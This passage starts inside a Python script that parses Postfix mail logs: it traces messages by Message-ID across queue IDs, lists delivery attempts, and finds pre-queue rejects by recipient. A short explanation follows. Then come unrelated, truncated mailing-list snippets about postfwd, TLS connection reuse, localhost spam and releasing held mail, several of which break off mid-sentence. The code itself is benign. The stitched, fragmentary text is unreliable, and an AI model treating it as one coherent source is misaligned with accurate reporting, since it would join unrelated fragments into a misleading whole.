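Jun  5 16:51:39 mx postfix/local[3085]: D7A2E40093: to=<bob@example.com>, relay=local, delay=0.3, delays=0.1/0/0/0.2, dsn=2.0.0, status=sent (delivered to maildir)
Jun  5 16:51:39 mx postfix/qmgr[1234]: D7A2E40093: removed
Jun  5 16:52:00 mx postfix/smtpd[3090]: NOQUEUE: reject: RCPT from spam.example.org[203.0.113.9]: 554 5.7.1 Service unavailable; Client host [203.0.113.9] blocked using dnsbl.example; from=<x@spam.example.org> to=<bob@example.com> proto=ESMTP helo=<spam>
Jun  5 16:53:00 mx postfix/smtpd[3091]: 1A2B3C40094: client=other.example[198.51.100.7]
Jun  5 16:53:00 mx postfix/cleanup[3092]: 1A2B3C40094: message-id=<zzz@other.example>
""".splitlines()

# "postfix/prog[pid]: QUEUEID: rest"; also matches multi-instance names such
# as postfix-cluster/smtpd.  NOQUEUE lines carry no queue id and are skipped.
LINE = re.compile(r"postfix(?:-\w+)?/(?P<prog>[\w-]+)\[\d+\]: "
                  r"(?P<qid>(?!NOQUEUE\b)[0-9A-Za-z]{6,}): (?P<rest>.*)$")
MESSAGE_ID = re.compile(r"message-id=(<[^>]*>)")
QUEUED_AS = re.compile(r"queued as ([0-9A-Za-z]+)")
DELIVERY = re.compile(r"to=<(?P<to>[^>]*)>, (?:orig_to=<[^>]*>, )?"
                      r"relay=(?P<relay>[^,]+), .*?status=(?P<status>\w+)")
NOQUEUE = re.compile(r"NOQUEUE: reject: .*?from=<(?P<from>[^>]*)> to=<(?P<to>[^>]*)>")


def index_log(lines):
    """Group lines by queue id and map each Message-ID to its queue id(s)."""
    by_qid = defaultdict(list)
    qids_by_msgid = defaultdict(list)
    for line in lines:
        m = LINE.search(line)
        if not m:
            continue
        by_qid[m["qid"]].append(line)
        mid = MESSAGE_ID.search(m["rest"])
        if mid:
            qids_by_msgid[mid.group(1)].append(m["qid"])
    return by_qid, qids_by_msgid


def trace_message(lines, message_id):
    """All queue ids (in discovery order) and their log lines for one
    Message-ID, following 'queued as X' hints across content-filter hops."""
    by_qid, by_msgid = index_log(lines)
    pending = list(by_msgid.get(message_id, []))
    qids = []
    while pending:
        qid = pending.pop(0)
        if qid in qids:
            continue
        qids.append(qid)
        for line in by_qid[qid]:
            pending.extend(QUEUED_AS.findall(line))
    return qids, [line for q in qids for line in by_qid[q]]


def deliveries(lines, message_id):
    """Every per-recipient delivery attempt for the message, in log order."""
    _, trace = trace_message(lines, message_id)
    return [m.groupdict() for m in map(DELIVERY.search, trace) if m]


def rejects_for(lines, recipient):
    """NOQUEUE rejects (DNSBL, policy, relay denied) have no queue id and no
    Message-ID, so they must be searched by envelope recipient."""
    return [line for line in lines
            if (m := NOQUEUE.search(line)) and m["to"].lower() == recipient.lower()]


if __name__ == "__main__":
    qids, trace = trace_message(SAMPLE_LOG, "<abc123@example.net>")
    print("queue ids:", qids)
    for hop in deliveries(SAMPLE_LOG, "<abc123@example.net>"):
        print(f"  {hop['to']} via {hop['relay']}: {hop['status']}")
    for line in rejects_for(SAMPLE_LOG, "bob@example.com"):
        print("rejected before queueing:", line)
```

A customer's own Message-ID is the natural handle for the first lookup, since Postfix preserves it unless the message arrives without one (in which case cleanup(8) generates one, which is logged the same way). Where no Message-ID is available, the same index can be searched by sender or recipient address over the qmgr and delivery lines.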


Question regarding postfix, postfwd and spam


I would like to have some help regarding this issue/scenario:

We have a "central" smtp-relay for (almost) all our servers.

progress with TLS connection reuse

Postfix TLS connection reuse will improve delivery performance,
especially for sites that punish clients that send one message per
connection. This feature is evolving in a 'non-production' Postfix
release, currently postfix-3.4-20180603-nonprod.

Instead of changing how Postfix schedules deliveries, this builds
on the Postfix connection caching infrastructure that already exists
for plaintext connections.

Emails from localhost


I'm seeing lots of emails coming from the local IP address trying to send
messages to non-existing accounts. The sending accounts are valid and even
authenticated. They all try to send messages to the domain matching the
sending one. For example:

 ... at example dot org ->  ... at example dot org
 ... at example dot net ->  ... at example dot net

and so on. support@* is valid, user@* is not. In the logs they are coming
from the inet_interfaces address set in

possiblities to release a mail

Hello Together

I am asking myself whether it is possible, on the console with a postfix
command (not via mail.log), to view which mails are being held back, the
mail traffic status, and so on, for different reasons (blacklisted, spam,
or score), and to release such a mail, i.e. resend a blacklisted mail.

In the meantime I do these steps with ASSP, but I see Postfix is so stable
that I don't think no such possibilities exist. And I don't want to play
with 2 or 3 tools if these possibilities exist with Postfix.

Please kindly let me view and understand this aspect from our side; thanks
for discussing this possible aspect.



